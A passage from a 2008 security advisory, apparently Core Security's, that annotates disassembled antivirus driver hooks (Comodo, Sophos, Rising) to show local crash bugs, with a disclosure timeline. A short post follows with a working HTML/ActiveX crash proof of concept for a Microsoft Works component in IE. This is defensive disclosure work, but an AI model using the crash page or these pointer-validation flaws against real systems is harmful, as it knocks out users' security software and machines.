.text:00010AEF xor ebx, ebx
.text:00010AF1 cmp [eax+140h], bl
.text:00010AF7 jz short loc_10B0D
.text:00010AF9 call PsGetCurrentProcessId
.text:00010AFE call PsGetCurrentProcessId
.text:00010B03 push eax
.text:00010B04 call sub_10724
.text:00010B09 test eax, eax
.text:00010B0B jnz short loc_10B12
.text:00010B0D
.text:00010B0D loc_10B0D: ; CODE XREF: sub_10ADE+19_j
.text:00010B0D push [ebp+ClientId]
.text:00010B10 jmp short loc_10B73

.text:00010B12
.text:00010B12 loc_10B12: ; CODE XREF: sub_10ADE+2D_j
.text:00010B12 mov edi, [ebp+ClientId]
.text:00010B15 cmp edi, ebx ; Little check to avoid a Null Pointer

- ———–/

Here it gets the pointer to the 'ClientId' value, and if it is non zero
('!= 0') it does not care where it is pointing to.

/———–

.text:00010B17 jnz short loc_10B1C
.text:00010B19 push ebx
.text:00010B1A jmp short loc_10B73

.text:00010B1C
.text:00010B1C loc_10B1C: ; CODE XREF: sub_10ADE+39_j
.text:00010B1C mov [ebp+ms_exc.disabled], ebx
.text:00010B1F mov esi, [edi] ; Here it crashes

- ———–/

It accesses that memory, and if that is invalid memory the system will
crash.

/———–

.text:00010B21 mov [ebp+var_1C], esi
.text:00010B24 or [ebp+ms_exc.disabled], 0FFFFFFFFh
.text:00010B28 jmp short loc_10B3B
.text:00010B28 sub_10ADE endp

- ———–/

2) COMODO FIREWALL PRO (BID 28742, CVE-2008-1736)

In Comodo there are problems in the arguments validation of the
'NtDeleteFile', 'NtCreateFile' and 'NtSetThreadContext' functions.
'NtDeleteFile' receives just one parameter, a pointer to an
'OBJECT_ATTRIBUTES' structure. These attributes would include the
'ObjectName' and the 'SECURITY_DESCRIPTOR', for example. This is the
hook placed by Comodo at 'NtDeleteFile'.

/———–

NTDeleteFile (POBJECT_ATTRIBUTES ObjectAttributes)

.text:0001ACB0 push 1Ch
.text:0001ACB2 push offset stru_1E3F0
.text:0001ACB7 call __SEH_prolog
.text:0001ACBC xor ebx, ebx
.text:0001ACBE inc ebx
.text:0001ACBF mov [ebp+var_1C], ebx
.text:0001ACC2 xor esi, esi
.text:0001ACC4 mov [ebp+var_24], esi
.text:0001ACC7 mov [ebp+var_20], ebx
.text:0001ACCA mov [ebp+var_28], esi
.text:0001ACCD mov [ebp+ms_exc.disabled], esi
.text:0001ACD0 call ds:ExGetPreviousMode
.text:0001ACD6 mov edi, [ebp+ObjectAttributes]

- ———–/

Here it does a lot of 'ProbeForRead' checks to see if the pointers of
the structure are valid. Nice! ('EDI' still has a pointer to the
'OBJECT_ATTRIBUTES' structure)

/———–

….
.text:0001AD25 push edi ; ObjectAttributes
.text:0001AD26 call sub_1A692 ; Here it passes the OBJECT_ATTRIBUTES structure pointer to the next function.

sub_1A692
.text:0001A692 push 28h
.text:0001A694 push offset stru_1E3C0
.text:0001A699 call __SEH_prolog
.text:0001A69E xor edi, edi
….
.text:0001A6B3 mov [ebp+ms_exc.disabled], edi
.text:0001A6B6 push 72747052h ; Tag
.text:0001A6BB mov ebx, 400h
.text:0001A6C0 push ebx ; NumberOfBytes
.text:0001A6C1 push 1 ; PoolType
.text:0001A6C3 call ds:ExAllocatePoolWithTag ; Allocates memory to hold the data retrieved by ZwQueryObject
.text:0001A6C9 mov esi, eax
.text:0001A6CB mov [ebp+var_28], esi
.text:0001A6CE cmp esi, edi
.text:0001A6D0 jz short loc_1A74F

.text:0001A6D2 mov edi, [ebp+ObjectAttributes]
.text:0001A6D5 mov eax, [edi+OBJECT_ATTRIBUTES.RootDirectory] ; Here the code retrieves the RootDirectory field value from the structure, controlled by us.
.text:0001A6D8 test eax, eax
.text:0001A6DA jz short loc_1A71B

.text:0001A6DC push 0 ; ReturnLength
.text:0001A6DE push ebx ; ObjectInformationLength
.text:0001A6DF push esi ; ObjectInformation
; buffer where ZwQueryObject will put the object information

.text:0001A6E0 push 1 ; ObjectInformationClass
; Specifies an OBJECT_INFORMATION_CLASS value that determines the type
; of information returned in the ObjectInformation buffer. It's using
; an undocumented type (OBJECT_NAME_INFORMATION) which returns a
; UNICODE_STRING structure
.text:0001A6E2 push eax ; ObjectHandle
; Now the user-controlled handle will be used here to identify the
; object by ZwQueryObject
.text:0001A6E3 call ds:ZwQueryObject
.text:0001A6E9 mov [ebp+var_20], eax
.text:0001A6EC test eax, eax
.text:0001A6EE jl short loc_1A746

- ———–/

Here is where the problem shows up. The code does not properly validate
the data retrieved by 'ZwQueryObject', expecting a 'UNICODE_STRING'
structure. But it is possible to make multiple calls to the function
using different handles to obtain a null structure, crashing the system
when the code tries to dereference its 'Buffer' field.

/———–

.text:0001A6F0 movzx eax, [esi+UNICODE_STRING.Length]
.text:0001A6F3 shr eax, 1
.text:0001A6F5 mov ecx, [esi+UNICODE_STRING.Buffer]
.text:0001A6F8 movzx eax, word ptr [ecx+eax*2-2] ; Here is the problem
.text:0001A6FD mov [ebp+var_30], eax
.text:0001A700 cmp ax, 5Ch
.text:0001A704 jz short loc_1A725

- ———–/

3) SOPHOS ANTIVIRUS (BID 28743, CVE-2008-1737)

Insufficient argument validation of hooked SSDT functions on Sophos lead
to a DoS. An attacker, utilizing this flaw, would be able to locally
reboot the whole system shutting down the Firewall or AV protection.
Although neither the vendor nor Core Security has found a means of
exploiting the flaw to execute arbitrary code, it has not been possible
to rule this out.

In Sophos AV there is a problem in the arguments validation of the
'NtCreateKey' function.

/———–

int __cdecl NtCreateKeyHook(PHANDLE pKeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition)

[…]
.text:0001C01C push 4 ; Alignment
.text:0001C01E push 18h ; Length
.text:0001C020 mov esi, [ebp+ObjectAttributes]
.text:0001C023 push esi ; Address
.text:0001C024 call ds:ProbeForRead

- ———–/

Here it checks that 'ObjectAttributes' points to a valid address.

/———–

.text:0001C02A mov eax, [esi+OBJECT_ATTRIBUTES.RootDirectory]
.text:0001C02D mov [ebp+Handle], eax
.text:0001C030 mov esi, [esi+OBJECT_ATTRIBUTES.ObjectName]
.text:0001C033 mov [ebp+pUnicodeString], esi

- ———–/

Now, it gets from 'OBJECT_ATTRIBUTES' a handle and a pointer to a
'UNICODE_STRING' structure.

/———–

.text:0001C095 push 4
.text:0001C097 push 8
.text:0001C099 push esi
.text:0001C09A mov ebx, ds:ProbeForRead
.text:0001C0A0 call ebx ; ProbeForRead, it checks the pointer before the dereference.

.text:0001C0A2 mov eax, dword ptr [esi+UNICODE_STRING.Length]
.text:0001C0A4 mov dword ptr [ebp+stUnicodeString.Length], eax
.text:0001C0A7 mov esi, [esi+UNICODE_STRING.Buffer] ; And gets from the UNICODE_STRING structure a pointer to the unicode buffer.
.text:0001C0AA mov [ebp+stUnicodeString.Buffer], esi
.text:0001C0AD push 2 ; Alignment
.text:0001C0AF shr eax, 10h
.text:0001C0B2 push eax ; Length
.text:0001C0B3 push esi ; Address
.text:0001C0B4 call ebx ; ProbeForRead

- ———–/

It does the check, but here is the problem

/———–

.text:0001C0B6 push gdwValue
.text:0001C0BC lea eax, [ebp+stUnicodeString]
.text:0001C0BF push eax
.text:0001C0C0 push [ebp+Object]
.text:0001C0C3 call sub_1cb40

- ———–/

The problem lies in the function not properly checking the 'Length'
field of the 'UNICODE_STRING' structure. When doing the check,
'ProbeForRead' receives the length field of the structure as a parameter
without any kind of validation.

So, if we set this field to 0, 'ProbeForRead' will not raise any
exception even though we pass it an invalid address. And it will
crash when trying to access the desired invalid memory.

/———–

sub_1cb40

[…]
.text:0001CB5E xor esi, esi
.text:0001CB60 mov [ebp+ms_exc.disabled], esi
.text:0001CB63 mov edi, [ebp+pUnicodeString]
.text:0001CB66 mov eax, [edi+UNICODE_STRING.Buffer]

- ———–/

And here is where it will crash:

/———–

.text:0001CB69 cmp word ptr [eax], '\' ; Reference the first pointed byte

- ———–/

4) RISING ANTIVIRUS (BID 28744, CVE-2008-1738)

In Rising antivirus the code of the 'NtOpenProcess' hook does not
validate whether the pointer to the structure

/———–

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

- ———–/

is really pointing to mapped memory. So, when the code tries to
dereference the pointer to check the 'CLIENT_ID->UniqueProcess' value,
it will crash if the pointer points to invalid memory.

/———–

NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId )

.text:00010EAA push ebp
.text:00010EAB mov ebp, esp
.text:00010EAD push esi
.text:00010EAE mov esi, offset Addend
.text:00010EB3 push edi
.text:00010EB4 mov ecx, esi ; Addend
.text:00010EB6 call ds:InterlockedIncrement
.text:00010EBC call PsGetCurrentProcessId
.text:00010EC1 cmp eax, dword_11C8C
.text:00010EC7 jnz short loc_10ECE
.text:00010EC9
.text:00010EC9 loc_10EC9: ; CODE XREF: sub_10EAA+37_j
.text:00010EC9 push [ebp+ClientId]
.text:00010ECC jmp short loc_10EF0

.text:00010ECE
.text:00010ECE loc_10ECE: ; CODE XREF: sub_10EAA+1D_j
.text:00010ECE call PsGetCurrentProcessId
.text:00010ED3 mov ecx, dword_11C80
.text:00010ED9 push eax
.text:00010EDA call sub_11070
.text:00010EDF test al, al
.text:00010EE1 jnz short loc_10EC9
.text:00010EE3 call PsGetCurrentProcessId
.text:00010EE8 mov edi, [ebp+ClientId] ; Here is the bug: if ClientId points to an invalid address,
.text:00010EEB cmp eax, [edi] ; it will crash.
.text:00010EED jnz short loc_10F0D

- ———–/

*Report Timeline*

. 2008-01-11: Core Security Technologies found a security vulnerability
in BitDefender antivirus.
. 2008-01-14: BitDefender team is contacted by Core.
. 2008-01-15: BitDefender team asks Core for technical description of
the vulnerability.
. 2008-01-15: Technical details are sent to BitDefender team by Core.
. 2008-01-22: BitDefender notifies Core that a fix has been produced and
the flaw was corrected through automatic updates.
. 2008-02-04: According to the original schedule, the CORE-2008-0320
advisory would be released at this date, but similar flaws in other
antivirus products were discovered by Core exploit writers team.
Considering all BitDefender users are patched, Core Security
Technologies does not release the advisory and continues the research of
this issue in other products.
. 2008-03-20: Core analyzes similar vulnerabilities in Comodo Firewall,
Sophos Antivirus and Rising Antivirus.
. 2008-03-25: Core notifies the Comodo, Sophos and Rising teams of the
vulnerabilities.
. 2008-03-27: Comodo team asks Core for technical description of the
vulnerability.
. 2008-03-27: Technical details are sent to Comodo team by Core.
. 2008-03-31: Rising team asks Core for technical description of the
vulnerability.
. 2008-04-01: Technical details are sent to Rising team by Core.
. 2008-04-02: Rising team informs Core that the flaw has been fixed in
the Rising AV 2008 version.
. 2008-04-02: Sophos team asks Core for technical description of the
vulnerability.
. 2008-04-07: Technical details are sent to Sophos team by Core.
. 2008-04-11: Sophos team informs that the flaw is found in one of the
antivirus drivers, and fixing it will require a reboot for all of Sophos
Windows customers. Sophos would like to fix the bug in the next major
version (second quarter 2009), in particular considering the fact that
they were unable to come up with any practical use of this vulnerability.
. 2008-04-14: Comodo notifies Core that a fix has been produced.
. 2008-04-14: Sophos informs Core that they will be able to release a
fix to the vulnerability at the end of October 2008.
. 2008-04-21: Core responds that they will reschedule the publication to
April 24th, 2008. Since the vulnerability is not critical, and has been
found using publicly available tools, like the other vulnerabilities
included in the advisory, Core doesn’t see a reason to postpone the
publication of the Sophos bug until October 2008.
. 2008-04-21: Sophos asks Core not to release details of the
vulnerability until a fix is available, and not to publish Proof of
Concept code. Sophos informs that they do not believe that arbitrary
code execution is possible.
. 2008-04-24: Core responds that the advisory does not contain Proof of
Concept code. Core confirms its intention of publishing the advisory,
including the technical description, but decides to postpone it to April
28th, to give the participants more time to coordinate the release of
public information.
. 2008-04-25: Sophos provides additional information, included in the
“vendor information” section of the advisory.
. 2008-04-28: CORE-2008-0320 advisory is published.

*References*

[1] http://www.bitdefender.com
[2] http://www.comodo.com
[3] http://www.sophos.com
[4] http://www.rising-global.com
[5] http://www.matousec.com/downloads
[6] http://www.matousec.com/info/articles/plague-in-security-software-drivers.php

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company’s flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

Vulnerability Announcements | GreySign | 29 Apr 2008

Warning: another IE 0-day vulnerability

Published: 2008-4-17

Last updated: 2008-4-17 2137 GMT

In the last few days a PoC said to be an IE 0-day has been circulating on the Internet. On Windows XP it affects both IE6 and IE7; other systems were not tested. The vulnerability is actually not in IE itself but in a Microsoft Works component. Some XP machines come with Microsoft Works pre-installed, so even a fully patched system is affected (the ASUS Eee PC, for example, ships with Microsoft Works). Affected DLL version: Microsoft Works 7 WkImgSrv.dll (7.03.0616.0). The crash PoC below comes from: http://hi.baidu.com/nansec/blog/item/299edffcd582d4f8fc037fb9.html

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
    function payload() {
        var num = -1;
        obj.WksPictureInterface = num;
    }
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>

Source: 知道安全

Vulnerability Announcements | GreySign | 17 Apr 2008